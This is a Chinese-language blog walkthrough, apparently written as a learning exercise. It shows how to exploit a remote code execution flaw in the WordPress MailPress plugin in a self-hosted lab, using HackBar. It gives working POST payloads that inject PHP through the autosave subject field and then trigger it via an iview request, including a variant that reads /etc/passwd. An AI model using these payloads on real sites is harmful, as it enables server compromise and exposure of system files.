WordPress-Mailpress远程代码执行漏洞——利用

相关资料：

http://www.jeeseen.com/archives/421.html

http://www.xingkonglangzi.com/post-662.html

https://www.exehack.net/3509.html

https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

我的漏洞环境是http://X.X.X.X:18000/（我的便宜安全师父搭的）

一、首先，我使用Firefox，在Firefox里添加一个叫做HackBar的插件：

直接使用Firefox浏览器搜索HackBar,选中第一个点进去

点进去之后添加HackBar到Firefox,然后按照提示重启Firefox就好：

重启之后的Firefox会在顶端多出一点东西：

二、接下来就是利用漏洞了：

按照那些资料提示，我们把URL写到HackBar中（注意这里的URL是你的漏洞环境的ip地址和端口），然后选中enable post data写要提交的数据：

  URL：

http://漏洞环境ip：端口号/wp-content/plugins/mailpress/mp-includes/action.php post： action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

把上一步得到的ID写在下一步的URL中

URL：

http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=上一步得到的ID

到这里该漏洞的基本的利用已经实现

三、师父还留个扩展问题，利用php系统函数去尝试读取 /etc/passwd 文件：

这里就把前面的post数据中subject的数据改掉，改为<?php echo file_get_contents('/etc/passwd')?>

改过后的post数据为：

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php echo file_get_contents('/etc/passwd')?>&html=&plaintext=&mail_format=standard&autosave=1

相关步骤及结果截图如下：